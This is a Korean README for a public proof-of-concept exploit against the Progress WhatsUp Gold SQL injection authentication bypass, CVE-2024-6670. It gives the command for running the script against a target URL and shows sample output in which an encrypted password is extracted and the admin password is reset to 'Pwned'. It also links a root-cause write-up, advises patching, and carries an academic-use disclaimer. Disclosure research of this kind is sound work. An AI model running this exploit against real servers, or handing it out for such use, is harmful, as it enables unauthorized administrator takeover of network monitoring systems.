
Progress WhatsUp Gold SQL 인젝션 인증 우회 (CVE-2024-6670)에 대한 개념 증명 익스플로잇. 근본 원인 분석 및 관리자 접근을 위한 자동 비밀번호 재설정 포함.
Progress Software WhatsUp Gold HasErrors SQL Injection 인증 우회 취약점 (CVE-2024-6670)에 대한 PoC
해당 취약점의 근본 원인 분석은 제 블로그에서 확인할 수 있습니다:
https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
python CVE-2024-6670.py --newpassword Pwned --target-url https://192.168.201.150
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
[^_^] Starting the exploit...
[*] Used remote primitive to encrypt our passowrd
[*] encrypted password extracted -> 0x03000000100000000EABC7F4B1C8263DADB17E4BED835C0F
[+] Exploit finished, you can now login using the username -> admin and password -> Pwned
최신 버전으로 업데이트하거나 Progress Advisory의 지침에 따라 완화 조치를 취하십시오.
제가 오랜 시간 알고 지낸 친애하는 친구 Manish가 저에게 전해준 동기부여와 교훈이 없었다면, 이 버그를 익스플로잇할 수 없었을 것입니다. 감사합니다, 친구여.
이 소프트웨어는 순전히 학술 연구 목적과 효과적인 방어 기술 개발을 위해 제작되었으며, 명시적으로 승인된 경우를 제외하고 시스템 공격에 사용하기 위한 것이 아닙니다. 프로젝트 관리자는 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하십시오.